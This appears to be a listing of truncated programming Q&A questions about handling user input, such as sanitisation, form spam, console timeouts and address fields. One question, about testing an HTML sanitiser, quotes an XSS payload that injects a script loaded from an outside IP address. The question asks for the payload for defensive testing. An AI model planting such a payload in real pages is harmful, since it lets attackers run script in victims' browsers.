User equals untrustworthy. Never trust untrustworthy user's input. I get that. However, I am wondering when the best time to sanitize input is. For example, do you blindly store user input and then sanitize it whenever it is accessed/used, or do you sanitize the input immediately and then store this "cleaned" version? Maybe there are als...
Is there a good library to use for gathering user input in Linux from the mouse/keyboard/joystick that doesn't force you to create a visible window to do so? SDL lets you get user input in a reasonable way, but seems to force you to create a window, which is troublesome if you have abstracted control so the control machine doesn't have ...
I'm trying to reduce the form spam on our website. (It's actually pretty recent). I seem to remember reading somewhere that the spammers aren't executing the Javascript on the site. Is that true? And if so, then could you simply check for javascript being disabled and then figure it's likely that it's spam? ...
My current project is to write a web application that is an equivalent of an existing desktop application. In the desktop app at certain points in the workflow the user might click on a button and then be shown a form to fill in. Even if it takes a little time for the app to display the form, expert users know what the form will be a...
I'm looking for the best way to take a simple input: echo -n "Enter a string here: " read -e STRING and clean it up by removing non-alphanumeric characters, lower(case), and replacing spaces with underscores. Does order matter? Is tr the best / only way to go about this? ...
I'm new to developing things on the web. So far, I'm spending a lot of time (50% or so) to try and prevent bad people from putting things like sql injection into my input forms and validating it server side. Is this normal? ...
I'm trying to present the (web) user with a useful subset of Olson timezones, though with a friendlier naming convention. Any recommendations for how to sort and label them for maximum usefulness? By country? Continent? GMT offset? I'm not very concerned about inaccuracy for past dates, so some of the timezones that are only histori...
Specifically I have a PHP command-line script that at a certain point requires input from the user. I would like to be able to execute an external editor (such as vi), and wait for the editor to finish execution before resuming the script. My basic idea was to use a temporary file to do the editing in, and to retrieve the contents of th...
How do I limit the types of HTML that a user can input into a textbox? I'm running a small forum using some custom software that I'm beta testing, but I need to know how to limit the HTML input. Any suggestions? ...
Our customer would like to know who is online and currently using the custom application we wrote for them. I discussed it with them and this doesn't need to be exact, more of a guestimate will work. So my thought were maybe a 15 minute time interval to determine user activity. Some ideas I have for doing this are as follows: Stam...
I have a PHP application which needs to output a python script, more specifically a bunch of variable assignment statements, eg. subject_prefix = 'This String From User Input' msg_footer = """This one too.""" The contents of subject_prefix et al need to be written to take user input; as such, I need to escape the contents of the strin...
In past many years I have registered on various applications and platforms hosted online or offline. Why white-spaces are not allowed in User Names as spaces are very natural to names and most of the computing systems can handle them efficiently. (Many people can raise similar questions about other special characters which are illegal....
I need to ask for input in console and wait for few sec may be a min after that I need to default to some value. How can basically time our on console input in c# and proceed with default settings? If you have sample code that would be great. ...
I am trying to find out how to upload a file from a web user to a server using an ASP page. The displayed page has an Input tag of type "File" like this: <input type="file" name="uploadfile"> And a submit button that passes the Form info to another .ASP page. This page must take the path it gets from the Input control and use it to ...
I'll try to explain my scenario as best i can; At each application tick I query the current state of the keyboard and mouse and wrap them in individual classes and data structures. For the keyboard it's an array of my Keys enum (one item for each of the keys that are currently pressed) and for the mouse it's a class containing coordinat...
I have a Java based web-application and a new requirement to allow Users to place variables into text fields that are replaced when a document or other output is produced. How have others gone about this? I was thinking of having a pre-defined set of variables such as : @BOOKING_NUMBER@ @INVOICE_NUMBER@ Then when a user enters some t...
My current app needs to store address information for a user. I'm currently debating whether to use the customary street address / city / state / zip textboxes and dropdowns or to go with Google's method of simply having everything on one line. Any thoughts on the pros/cons of storing address information in either of these manners? ...
I recently rolled an application that automatically encrypted a file output from another internal system using PGP and then sftp’d to a foreign target server directory where it was to be consumed by a third-party application. I have been trying to trouble shoot the whole process for about a week and was getting no response from the third...
Hi, I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror <img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www....
I am working on a small parser that should accept input in a number of languages. I am going to have maybe 50 strings that will serve as keywords/anchors in parsing the input. In PHP, what would be the best way to organize these translated keywords? One possible solution that comes to my mind is to use an associative array. Like this: ...